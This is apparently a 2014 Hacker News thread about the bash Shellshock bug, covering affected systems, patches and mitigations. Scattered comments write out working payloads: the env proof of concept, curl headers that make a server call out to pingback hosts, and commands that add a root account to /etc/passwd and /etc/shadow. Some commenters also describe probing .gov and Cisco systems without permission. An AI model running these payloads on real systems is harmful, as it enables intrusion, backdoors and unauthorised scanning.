A quick fix would be to stop using bash.

I write hundreds of shell scripts per year and I never, ever use bash. Everything can be done with a less complex /bin/sh having only POSIX-like features.

There's no reason webservers have to use bash by default.

Sysadmins might need a hefty shell will lots of features in order to do their work, but an httpd should not need access to bash-isms. It should work fine with a very minimal POSIX-like shell.

flebron11y ago

Maybe I'm doing something wrong, but I just tested it in ZSH (5.0.5, Linux) and the same vulnerable behavior seems to show up.

ckuehl11y ago

How are you testing it? If you're just pasting one of the proof-of-concept lines into zsh, such as this one:

    env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

...then you're really just executing bash. Replace "bash" in the line above with "zsh" and the "vulnerable" line is not printed.

adamtj11y ago

Even with the "zsh", this should print "vulnerable":

  env x='() { :;}; echo vulnerable' zsh -c "bash -c true"

You don't have to use bash explicitly. It might be called by some application or library. For example, if your default shell is a bash, this will work too:

  env x='() { :;}; echo vulnerable' zsh -c "python -c 'import os; os.system(\"true\")'"

1 more reply

flexd11y ago

I see this in zsh 5.0.0 on Ubuntu, and on OSX as well! zsh 5.0.2 (x86_64-apple-darwin13.0)

Crito11y ago

I'm not seeing this on zsh 4.3.17. Exactly what did you run to see this?

1 more reply

userbinator11y ago

spb11y ago

I'm hoping we'll see a patch soon that altogether removes this misfeature.

Zweihander11y ago

For more info: http://www.csoonline.com/article/2687265/application-securit...

This should be fun

nknighthb11y ago

CGI has always been an accident waiting to happen, but hardly anybody uses it anymore anyway, and even more rarely in a manner that invokes bash, of all things.

I fail to see how "HTTP requests" generically are a vector, and its "Here is a sample" statement is not a link and is followed by... nothing.

This article tells me nothing useful other than "don't allow untrusted data into your environment", which we've all known for 20 years.

rmc11y ago

This article tells me nothing useful other than "don't allow untrusted data into your environment", which we've all known for 20 years.

Yes, we've all known that. But we're slowly discovering all different ways the untrusted data can get there.

fl0wenol11y ago

peterwwillis11y ago

justincormack11y ago

People still shell out to do stuff from scripts from all sorts of languages. Unless these sanitize the environment they would be vulnerable.

1 more reply

huhtenberg11y ago

> hardly anybody uses it anymore anyway

Lots of PHP setups do.

2 more replies

why-el11y ago

Is someone from Heroku online here right now? My apps are all affected and since I am trusting Heroku with this, I am hoping they patch the system as soon as possible.

yuvadam11y ago

They will be patching shortly [1]

[1] - https://twitter.com/jacobian/status/514865870649061376

why-el11y ago

Yep, they did. :)

Oculus11y ago

Have big security vulnerabilities been cropping up more often recently or does it seem that way because I've started to pay attention?

drzaiusapelord11y ago

lonnyk11y ago

Are you referring to this apt-get vulnerability or another one: https://lists.debian.org/debian-security-announce/2014/msg00... ?

hijinks11y ago

http://www.cvedetails.com/browse-by-date.php

Its not like each year is an increase.. but it seems this year has had more major giant remote ones then in the past

dpeck11y ago

you're just paying attention. There have been some interesting ones the last year or two but this is really a trickle compared to early through mid 2000s

fromtheoutside11y ago

I still remember Redhat 6.2. Most remote exploits in a distribution ever.

zobzu11y ago

people started to pay attention. theres a bunch of new vulns being patched daily. if you follow cve's or oss list you can see that.

what's "new" (been done for a few years now) is that there's more marketing drive behind them. Fancy commercial names and websites dedicated and issues are often exaggerated.

Actually super critical vulns are still rare (like HB, codered, etc.)

h43k3r11y ago

I tested some of the sites and successfully executed some test code. One can easily google for such sites. The important thing is that, the link using which I ran the code is of a .gov site.

This thing seriously needs to be patched asap. Update your systems now.

Afforess11y ago

Even a harmless code exploit, when run on a computer system you do not have normal permission to use, is a felony in the USA.

m4r71n11y ago

Some more information was just posted to oss-sec:

http://seclists.org/oss-sec/2014/q3/650

ecze11y ago

With this bug, bash access to CiscoCallmanager is possible... Tested and working....

MichaelGG11y ago

VoIP software is hilariously insecure in general. This little bug is going to make some people a ton of money. Or even just cost some people a lot.

q3k11y ago

Same for Cisco NX-OS...

AnimalMuppet11y ago

Off topic:

This is why I keep coming back to HN. I've gotten an amazing amount of useful info on this very quickly. Great discussion - no trolling, no BS, just serious questions and serious answers.

prothid11y ago

Don't tell anyone.

hadoukenio11y ago

See:

http://en.wikipedia.org/wiki/Eternal_September

http://www.reddit.com/r/OutOfTheLoop/comments/1i8mp7/what_is...

MBlume11y ago

I'm a bit confused about how to properly patch my mac.

I mean I guess the answer is "you're probably not hosting a publicly accessible service on your mac, who cares?", which is true in my case, but still.

acdha11y ago

You're correct – you'd need to overwrite /bin/bash (think long and hard about this) to update it before Apple ships an update.

sehugg11y ago

There's some potentially funky stuff there like CUPS, which runs a local daemon that serves binary CGIs (though I think it's bound to localhost by default).

http://support.apple.com/kb/HT4169

Might be wise to turn all network-listening services off that you don't immediately need until a fix is available.

1 more reply

legulere11y ago

At least on linux that's not true as NetworkManager + dhclient is affected through malicious dhcp packets. There could be attack vectors almost everywhere.

1 more reply

mzs11y ago

http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052

http://www.opensource.apple.com/source/bash/

xeroxmalf11y ago

You could move /bin/bash to another location, and then create a symlink from the Homebrew version to /bin/bash.

BenjaminCoe11y ago

Wanted to share the simple Ansible script we used to patch CVE-2014-6271 at npm: https://github.com/npm/ansible-bashpocalypse

bowlofpetunias11y ago

Just did something similar with Ansible, the simple task "apt update_cache=yes pkg=bash state=latest" will do the trick. At least it did for me.

0x011y ago

The currently published fix is claimed to be incomplete: https://twitter.com/taviso/status/514887394294652929

Erwin11y ago

I tried to change this to a Python script and instead use os.popen. Well, Ubuntu /bin/sh is "dash" so that's not affected.

I tried to explicitly call bash via os.popen("bash -c 'some command'") -- no go either, as that bash command started by parsing some /etc/bash.bashrc file and complaining about newlines there.

Finally I used os.popen("bash --norc -c '/tmp/file date'") -- and that ended up running "date > /tmp/file" from the CGI script.

I tried replacing /bin/sh by "bash" instead of dash. That now made the CGI script choke on reading some other RC files due to the unexpected newlines in the context bash starts with.

So the question from me still seems to be: what is the weird context setup by that environment setup, and what else can do you with it than to redirect $1 to $0 ?

Erwin11y ago

That works for me too. I was first unsure but breaking it up into an export Z=.... and then running bash -c 'echo date' on a separate line seems to execute essentially date > echo.

scintill7611y ago

Here's an example using it to read files instead of write: https://news.ycombinator.com/item?id=8365205 But still, not as universal of an exploit as the original.

peterwwillis11y ago

Know what isn't vulnerable to this? Perl CGI scripts with taint mode enabled. http://perldoc.perl.org/perlsec.html#Taint-mode

  You may not use data derived from outside your program to affect something
  else outside your program--at least, not by accident. All command line
  arguments, environment variables, locale information (see perllocale),
  results of certain system calls (readdir(), readlink(), the variable
  of shmread(), the messages returned by msgrcv(), the password,
  gcos and shell fields returned by the getpwxxx() calls), and all
  file input are marked as "tainted".

  Tainted data may not be used directly or indirectly in any command
  that invokes a sub-shell, nor in any command that modifies files,
  directories, or processes, with the following exceptions:

phs250111y ago

Not true if the perl script calls out to bash (i.e. via system), as it doesn't sanitize the environment:

    $ env x='() { :;}; echo vulnerable' perl -T -e "\$ENV{PATH} = '/bin'; system('ls | cat');"  
    sh: warning: x: ignoring function definition attempt
    sh: error importing function definition for `x'
    ...

_b8r011y ago

My OSX Mavericks install appears to be affected:

  foom:~ steve$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  vulnerable
  this is a test

fluidcruft11y ago

Doesn't OSX ship the 8-year-old bash 3.2 (2006) i.e. the last version available as GPLv2? (Apple hates GPLv3)

actionscripted11y ago

For me in 10.9.5:

  $ bash --version
  GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
  Copyright (C) 2007 Free Software Foundation, Inc.

1 more reply

x3ro11y ago

It does. I installed an up-to-date version with homebrew a few months ago, and it was vulnerable as well. After a `brew update && brew upgrade bash` I had the fix installed, though :)

jvreeland11y ago

If i remember correctly Apples stopped updating bash in OSX a long time ago I wonder if this will get fixed.

DEinspanjer11y ago

My OSX was vulnerable too, but I use Homebrew, and the latest version of bash available via brew update && brew upgrade is patched against this.

If you haven't already been using Homebrew though, you will likely need to move /usr/local/bin infront of /usr/bin in your path, otherwise the old bash would still be used.

gwillem11y ago

This is quite stealthy way to scan, as Accept headers are generally not logged:

    curl -H 'Accept: () { :;}; /usr/bin/curl -so /dev/null http://my.pingback.com'

Found nothing so far though. IMHO the number of Bash CGI scripts in the wild must be pretty low.

antocv11y ago

Maybe the bash is invoked on some other request path, not just / which you are scanning.

I would go with /login and such, or write a crawler to parse out where the login/logout URLs are and try those.

dremel11y ago

Would disabling CGI e.g. adding Option -ExecCIG to httpd.conf for Apache prevent exploitation via the web-server?

mr_brown11y ago

import os os.putenv("ANYTHING", "() { :;}; echo bu") os.system("bash")

If this works (and it does) that means it's enough for a CGI script to invoke bash. It doesn't even have to be written in bash.

AntiRush11y ago

It seems like the current patch might not be a complete fix:

http://seclists.org/oss-sec/2014/q3/671

fl0wenol11y ago

ilconsigliere11y ago

Am I wrong in thinking that seems a bit worse than Heartbleed?

jrochkind111y ago

The exploit is worse.

Now, if there is some popular app that ends up vulnerable (perhaps because it shells out to bash), then that's definitely going to be huge.

But as it is... I'm not sure?

Erwin11y ago

ilconsigliere11y ago

Makes sense. This just strikes me as a very flexible exploit.

jrochkind111y ago

okay, i was wrong, this is way way worse.

apawloski11y ago

Google inurl:cgi-bin inurl:.sh

1 more reply

jtdowney11y ago

throwaway4915211y ago

What would be the best way to go if using Debian 5 (lenny)?

The only service exposed is ssh, and no one outside the company has an account. Is it still vulnerable through ssh?

baq11y ago

see http://seclists.org/oss-sec/2014/q3/651. can't say i understood much, but the answer i can give is 'likely'.

mdeeks11y ago

No, they would need a valid SSH account and password/key.

sauere11y ago

No update out for Ubuntu Server 14.04 yet.

/edit: the Red Hat blog has a good overview https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

hamiltonkibbe11y ago

Update for Ubuntu Server 14.04 is available

deathanatos11y ago

From just a functionality standpoint, how is even the patched version supposed to work? It seems to undefine the variable:

  % E='() { echo hi; }; echo cry' bash -c 'echo "-$E-"'
  bash: warning: E: ignoring function definition attempt
  bash: error importing function definition for `E'
  --

In fact, if I wanted my variable to be a function, why wouldn't I just explicitly eval it? What's the use case at all for this functionality?

dholl11y ago

I got tired of the hype. How's the following code for a mitigation?

The check should match for any variety of white space:

=(){

=() {

= ( ) {

etc... but feel free to update it for whatever other stupid things bash allows.

The code is at http://ad5ey.net/bash_shock_fix.c

Simple usage:

cd /bin

gcc -std=c11 -Wall -Wextra bash_shock_fix.c -o bash_shock_fix

mv bash bash.real

ln -s bash_shock_fix bash

phoenix(pts/1):~bin# ls -al bash*

lrwxrwxrwx 1 root root 14 Sep 27 00:23 bash -> bash_shock_fix

-rwxr-xr-x 1 root root 1029624 Sep 24 14:51 bash.real

-rwxr-xr-x 1 root root 9555 Sep 27 00:23 bash_shock_fix

-rw-r--r-- 1 root root 2990 Sep 27 00:23 bash_shock_fix.c

phoenix(pts/1):~bin#

jtchang11y ago

For this to happen the attacker has to control environment variables and then a bash shell is spawned.

Lots of web stuff spawn shells setting environment variables to stuff in HTTP headers. LC_TIME with some time zone settings might be one.

saurabhnanda11y ago

Am I vulnerable if using the Paperclip gem to manage file uploads on a Rails app (it internally fires up 'convert' to generate thumbnails, I believe).

What if there is an haproxy sitting in front of the Rails app?

detectify11y ago

We have added the CVE to our scanning routines and the update is now online on www.detectify.com. Test your environment for unpatched servers. In times like these it's OK to go for our free plan.

detectify11y ago

We just released a complete quick-test for #shellshock here: https://shellshock.detectify.com/. It's free to use and here's the information about how the scanner works: goo.gl/8vp6eo

Please feedback here: https://news.ycombinator.com/item?id=8366643

ck211y ago

Has the redhat patch been pushed through centos yet?

cesarb11y ago

Apparently, no. When it does, it should appear at http://lists.centos.org/pipermail/centos-announce/2014-Septe... (if you admin CentOS servers, it can be a good idea to subscribe to that list).

skorgu11y ago

Yes: http://lists.centos.org/pipermail/centos-announce/2014-Septe...

Verify your shasums before trusting a command line off the internet but:

rpm -Uvh http://mirror.centos.org/centos-6/6/updates/x86_64/Packages/... http://mirror.centos.org/centos-6/6/updates/x86_64/Packages/...

1 more reply

Eiriksmal11y ago

It's out by now for both Centos 6 and 7. Ironically, their Redhat brethren on the Fedora 20 project haven't released an update yet.

smsm4211y ago

My CentOS now says "ignoring function definition attempt" after the upgrade, so I assume CentOS update is now out.

SchizoDuckie11y ago

I'm by no means an expert, but am I completely wrong if I think something like this should work on an exploitable system to get a pingback from a vulnerable system without curl ?

  curl -A "() { :; }; echo GET /pingback.php | telnet bashexploitindexer.fake 80" http://expoitablehost.com/blah.cgi

piratebroadcast11y ago

My friend tried it on Heroku - It is affected.

Sanddancer11y ago

jimrandomh11y ago

Your regex was damaged by HN's comment formatting. To get it to post correctly, put it on a line with four leading spaces.

Sanddancer11y ago

Repost, because HN "formatted" it for me

    /\((.*)?\)\s*\{(.*)?\}\s*\;/

I have qualms against redhat's fix, because it seems like it would create too many false positives, and additionally looks way too easy to work around just by adding spaces, etc.

fragmede11y ago

Redhat has some here: https://access.redhat.com/articles/1200223

1 more reply

kacy11y ago

Ubuntu has been patched, it appears. If you're on Ubuntu, try this:

sudo apt-get update

sudo apt-get --only-upgrade install bash

mirashii11y ago

milankragujevic11y ago

Here's an easy to use and reliable scanner to test if your website is vulnerable. http://milankragujevic.com/projects/shellshock/

kalops11y ago

so basically turn off AcceptEnv in sshd_config?

justincormack11y ago

5 more replies

nknighthb11y ago

mdavidn11y ago

Don't forget SSH_ORIGINAL_COMMAND. GitHub and BitBucket had an exciting morning...

hijinks11y ago

I don't think so. From what I've been reading it can be exploited via http requests. I'm sure a metasploit script is right around the corner.

Edit: oh looks like only like mod_cgi related stuff is.. thats good then sort of

2 more replies

vhost-11y ago

For those of us with large clusters and chef, here is a useful knife command for updating bash on debian/ubuntu systems:

knife ssh 'name:*' 'sudo apt-get update && sudo apt-get install -y --only-upgrade bash'

rurban11y ago

super_mario11y ago

Interestingly enough ancient BASH version 3.2 on Mac OS X 10.9.5 is not vulnerable:

    $ echo $BASH_VERSION
    3.2.51(1)-release
    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
    $

I manually patched my BASH 4.3 to patch level 25 so it's not vulnerable either.

    $ echo $BASH_VERSION
    4.3.25(1)-release
    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
    $

daveloyall11y ago

That's ... weird, since the phrase "ignoring function definition attempt" wasn't added to bash 3.2 until today, with patch level 52.

http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052

Your paste indicates patch level 51.

The phrase in question doesn't appear on the internet much at all before today.

https://www.google.com/search?q="ignoring+function+definitio...

I presume that the one search result we see is due to a server that has an incorrect clock (or a time machine).

Fishkins11y ago

Hmm, I do see "vulnerable" print when I run that code on Mac OS X 10.9.5 with bash 3.2.51(1)-release.

aabdocker11y ago

I have same bash version and yet mine is vulnerable on OS X 10.10.

emmelaich11y ago

So proud of myself; my Python has env={} in the call to Popen().

The ultimate whitelist.

And they're executed with sudo but sudo empties out env vars with functions in them on the machines I use. Oldest is RHEL5.

snissn11y ago

Here is a very simple proof of concept that helped me understand the vulnerability:

  bash-3.2$ anyvariable='() { true; }; echo foo' bash
  foo

ITGabs11y ago

env x='() { :;}; echo "johndoe:x:0:0::/root:/bin/sh" >>/etc/passwd' bash -c "echo this is just a test"

env x='() { :;}; echo "johndoe:\$6\$eM5eLwRC\$eZhb4x7sf1ctGjN1fXrpsusRHRKTHf/E15OA2Nr4TdTF9F0SS4ousy3WrPCI2ofdNoAonRnNPQ7Ja3FQ/:15997:0:99999:7:::" >>/etc/shadow' bash -c "echo this is just a test"

Hacked!!

but this only work from root :/ and johndoe xD

jacksoncage11y ago

Saved a lot of time again today with salt! $ salt * pkg.install bash refresh=True and then check for right version $ salt * pkg.version bash

jamiepenney11y ago

Looks like Raspian have updated their bash package with the fix, so my Raspberry Pi is safe.

javert11y ago

So if a machine is not running a web server, does that mean that machine is not vulnerable?

scott_karana11y ago

It might not be vulnerable, but any context where a user can pass environment variables might be dangerous.

Eg, if you allow ANY environment variables in SSH rsync-only logins, or pass on any variables (for good or bad) in sudo scripts, etc.

MichaelGG11y ago

ars11y ago

No. Apparently ssh might be vulnerable.

FranOntanaya11y ago

Saucy wasn't patched by the time I did a do-release-upgrade a while ago.

pbrumm11y ago

Don't forget to update your docker containers and restart them.

mmagin11y ago

The patch: ftp://ftp.cwru.edu/pub/bash/bash-4.3-patches/bash43-025

jdimov11y ago

All the explanations of why this is bad seem to involve CGI. Didn't the CGI interface die in the 90's? Who uses that nowadays?

frou_dh11y ago

Though it's no doubt rickety, conceptually I really like CGI. Talk about loose coupling.

korzun11y ago

FreeBSD appears to be affected.

sjackso11y ago

...if you've installed bash from ports. The base system doesn't appear to be affected.

1 more reply

rsync11y ago

A default installation of FreeBSD is not affected, as FreeBSD does not have bash installed by default.

piratebroadcast11y ago

Someone please ELI5 (Explain Like I'm 5)?

cdelsolar11y ago

You're very likely pwned. Upgrade immediately.

piratebroadcast11y ago

Free BashBleed logo for tech journalists - http://i.imgur.com/ilJbM74.png

DCtn11y ago

You're not funny.

zobzu11y ago

I have a feeling this is blown out of proportion. Who's running bash setuid exactly? Right. Who's running shell CGIs today? Right.

So.. who has an example of common scripts that are executed remotely in most servers while accepting remote environment? Til then, the panic seems unjustified...

fabulist11y ago

CGIs are likely the smallest piece of the vulnerable hosts here. This is going to stick around as a local vulnerability on the plentiful supply of under-patched Linux boxes for a long time.

1 more reply

revelation11y ago

GitHub? I'm reminded of

https://gist.github.com/joernchen/a7c031b6b8df5d5d0b61

Of course that was fixed a long time ago, but I wonder what other systems are just a thin veneer over pretending the user controls a shell.

kazinator11y ago

adamt11y ago

1 more reply

j / k navigate · click thread line to collapse